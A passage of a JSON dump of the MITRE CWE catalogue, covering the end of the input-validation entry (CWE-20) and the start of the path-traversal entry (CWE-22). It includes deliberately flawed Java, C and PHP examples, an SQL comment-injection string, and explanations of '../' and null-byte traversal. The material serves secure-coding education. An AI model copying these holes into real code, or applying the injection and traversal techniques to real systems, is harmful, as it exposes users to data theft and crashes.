suspicious"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"Consider using language-theoretic security (LangSec) techniques that characterize inputs using a formal language and build \\"recognizers\\" for that language.  This effectively requires parsing to be a distinct layer that effectively enforces a boundary between raw input and internal data representations, instead of allowing parser code to be scattered throughout the program, where it could be subject to errors or inconsistencies that create weaknesses. [REF-1109] [REF-1110] [REF-1111]"},{"attr":{"@_Mitigation_ID":"MIT-7"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173)."},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.","Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings."]}},{"Phase":"Implementation","Description":"When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined."},{"attr":{"@_Mitigation_ID":"MIT-35"},"Phase":"Implementation","Description":"Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow."},{"Phase":"Implementation","Description":"Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input\'s values fall within the expected range of allowable values and that multi-field consistencies are maintained."},{"Phase":"Implementation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.","Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content."]}},{"Phase":"Implementation","Description":"When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-135"},"Intro_Text":"This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...public static final double price = 20.00;int quantity = currentUser.getAttribute(\\"quantity\\");double total = price * quantity;chargeUser(total);...","xhtml:br":["","","","",""]}},"Body_Text":"The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited."},{"attr":{"@_Demonstrative_Example_ID":"DX-136"},"Intro_Text":"This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...#define MAX_DIM 100...int m,n, error;board_square_t *board;printf(\\"Please specify the board height: \\\\n\\");error = scanf(\\"%d\\", &amp;m);if ( EOF == error ){}printf(\\"Please specify the board width: \\\\n\\");error = scanf(\\"%d\\", &amp;n);if ( EOF == error ){}if ( m &gt; MAX_DIM || n &gt; MAX_DIM ) {}board = (board_square_t*) malloc( m * n * sizeof(board_square_t));...","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":"/* board dimensions */","xhtml:div":[{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"Value too large: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program."},{"Intro_Text":"The following example shows a PHP application in which the programmer attempts to display a user\'s birthday and homepage.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$birthday = $_GET[\'birthday\'];$homepage = $_GET[\'homepage\'];echo \\"Birthday: $birthday&lt;br&gt;Homepage: &lt;a href=$homepage&gt;click here&lt;/a&gt;\\"","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"2009-01-09--"}],"Body_Text":["The programmer intended for $birthday to be in a date format and $homepage to be a valid URL. However, since the values are derived from an HTTP request, if an attacker can trick a victim into clicking a crafted URL with &lt;script&gt; tags providing the values for birthday and / or homepage, then the script will run on the client\'s browser when the web server echoes the content. Notice that even if the programmer were to defend the $birthday variable by restricting input to integers and dashes, it would still be possible for an attacker to provide a string of the form:","If this data were used in a SQL statement, it would treat the remainder of the statement as a comment. The comment could disable other security-related logic in the statement. In this case, encoding combined with input validation would be a more useful protection mechanism.","Furthermore, an XSS (CWE-79) attack or SQL injection (CWE-89) are just a few of the potential consequences when input validation is not used. Depending on the context of the code, CRLF Injection (CWE-93), Argument Injection (CWE-88), or Command Injection (CWE-77) may also be possible."]},{"attr":{"@_Demonstrative_Example_ID":"DX-34"},"Intro_Text":"The following example takes a user-supplied value to allocate an array of objects and then operates on the array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void buildList ( int untrustedListSize ){}","xhtml:div":{"#text":"if ( 0 &gt; untrustedListSize ){}Widget[] list = new Widget [ untrustedListSize ];list[0] = new Widget();","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"die(\\"Negative value supplied for list size, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}},"Body_Text":"This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown."},{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5305","Description":"Eval injection in Perl program using an ID that should only contain hyphens and numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305"},{"Reference":"CVE-2008-2223","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223"},{"Reference":"CVE-2008-3477","Description":"lack of input validation in spreadsheet program leads to buffer overflows, integer overflows, array index errors, and memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3477"},{"Reference":"CVE-2008-3843","Description":"insufficient validation enables XSS","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3843"},{"Reference":"CVE-2008-3174","Description":"driver in security product allows code execution due to insufficient validation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3174"},{"Reference":"CVE-2007-3409","Description":"infinite loop from DNS packet with a label that points to itself","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3409"},{"Reference":"CVE-2006-6870","Description":"infinite loop from DNS packet with a label that points to itself","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6870"},{"Reference":"CVE-2008-1303","Description":"missing parameter leads to crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1303"},{"Reference":"CVE-2007-5893","Description":"HTTP request with missing protocol version number leads to crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5893"},{"Reference":"CVE-2006-6658","Description":"request with missing parameters leads to information exposure","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6658"},{"Reference":"CVE-2008-4114","Description":"system crash with offset value that is inconsistent with packet size","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114"},{"Reference":"CVE-2006-3790","Description":"size field that is inconsistent with packet size leads to buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3790"},{"Reference":"CVE-2008-2309","Description":"product uses a denylist to identify potentially dangerous content, allowing attacker to bypass a warning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2309"},{"Reference":"CVE-2008-3494","Description":"security bypass via an extra header","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3494"},{"Reference":"CVE-2008-3571","Description":"empty packet triggers reboot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3571"},{"Reference":"CVE-2006-5525","Description":"incomplete denylist allows SQL injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5525"},{"Reference":"CVE-2008-1284","Description":"NUL byte in theme name causes directory traversal impact to be worse","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1284"},{"Reference":"CVE-2008-0600","Description":"kernel does not validate an incoming pointer before dereferencing it","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600"},{"Reference":"CVE-2008-1738","Description":"anti-virus product has insufficient input validation of hooked SSDT functions, allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1738"},{"Reference":"CVE-2008-1737","Description":"anti-virus product allows DoS via zero-length field","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1737"},{"Reference":"CVE-2008-3464","Description":"driver does not validate input from userland to the kernel","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3464"},{"Reference":"CVE-2008-2252","Description":"kernel does not validate parameters sent in from userland, allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2252"},{"Reference":"CVE-2008-2374","Description":"lack of validation of string length fields allows memory consumption or buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2374"},{"Reference":"CVE-2008-1440","Description":"lack of validation of length field leads to infinite loop","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1440"},{"Reference":"CVE-2008-1625","Description":"lack of validation of input to an IOCTL allows code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1625"},{"Reference":"CVE-2008-3177","Description":"zero-length attachment causes crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3177"},{"Reference":"CVE-2007-2442","Description":"zero-length input causes free of uninitialized pointer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442"},{"Reference":"CVE-2008-5563","Description":"crash via a malformed frame structure","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5563"},{"Reference":"CVE-2008-5285","Description":"infinite loop from a long SMTP request","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5285"},{"Reference":"CVE-2008-3812","Description":"router crashes with a malformed packet","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3812"},{"Reference":"CVE-2008-3680","Description":"packet with invalid version number leads to NULL pointer dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3680"},{"Reference":"CVE-2008-3660","Description":"crash via multiple \\".\\" characters in file extension","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3660"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Input validation and representation"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR07-C","Entry_Name":"Prefer functions that support error checking over equivalent functions that don\'t"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO30-C","Entry_Name":"Exclude user input from format strings","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM10-C","Entry_Name":"Define and use a pointer validation function"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":20,"Entry_Name":"Improper Input Handling"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"101"}},{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"109"}},{"attr":{"@_CAPEC_ID":"110"}},{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"135"}},{"attr":{"@_CAPEC_ID":"136"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"153"}},{"attr":{"@_CAPEC_ID":"182"}},{"attr":{"@_CAPEC_ID":"209"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"23"}},{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"261"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"28"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"473"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"588"}},{"attr":{"@_CAPEC_ID":"63"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"664"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"83"}},{"attr":{"@_CAPEC_ID":"85"}},{"attr":{"@_CAPEC_ID":"88"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-166"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-168","@_Section":"Input Validation Attacks"}},{"attr":{"@_External_Reference_ID":"REF-48"}},{"attr":{"@_External_Reference_ID":"REF-170"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 10, &#34;All Input Is Evil!&#34; Page 341"}},{"attr":{"@_External_Reference_ID":"REF-1109"}},{"attr":{"@_External_Reference_ID":"REF-1110"}},{"attr":{"@_External_Reference_ID":"REF-1111"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":"CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks."},{"#text":"As of 2020, this entry is used more often than preferred, and it is a source of frequent confusion. It is being actively modified for CWE 4.1 and subsequent versions.","attr":{"@_Type":"Maintenance"}},{"#text":"Concepts such as validation, data transformation, and neutralization are being refined, so relationships between CWE-20 and other entries such as CWE-707 may change in future versions, along with an update to the Vulnerability Theory document.","attr":{"@_Type":"Maintenance"}},{"#text":"Input validation - whether missing or incorrect - is such an essential and widespread part of secure development that it is implicit in many different weaknesses. Traditionally, problems such as buffer overflows and XSS have been classified as input validation problems by many security professionals. However, input validation is not necessarily the only protection mechanism available for avoiding such problems, and in some cases it is not even sufficient. The CWE team has begun capturing these subtleties in chains within the Research Concepts view (CWE-1000), but more work is needed.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Terminology"},"xhtml:p":["The \\"input validation\\" term is extremely common, but it is used in many different ways. In some cases its usage can obscure the real underlying weakness or otherwise hide chaining and composite relationships.","Some people use \\"input validation\\" as a general term that covers many different neutralization techniques for ensuring that input is appropriate, such as filtering, canonicalization, and escaping. Others use the term in a more narrow context to simply mean \\"checking if an input conforms to expectations without changing it.\\"  CWE uses this more narrow interpretation."]}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Maintenance_Notes, Modes_of_Introduction, Observed_Examples, Relationships, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Input Validation","attr":{"@_Date":"2009-01-12"}}}},"22":{"attr":{"@_ID":"22","@_Name":"Improper Limitation of a Pathname to a Restricted Directory (\'Path Traversal\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.","Extended_Description":{"xhtml:p":["Many file operations are intended to take place within a restricted directory. By using special elements such as \\"..\\" and \\"/\\" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the \\"../\\" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as \\"/usr/local/bin\\", which may also be useful in accessing unexpected files. This is referred to as absolute path traversal.","In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to widen the scope of attack. For example, the software may add \\".txt\\" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Directory traversal"},{"Term":"Path traversal","Description":"\\"Path traversal\\" is preferred over \\"directory traversal,\\" but both terms are attack-focused."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security 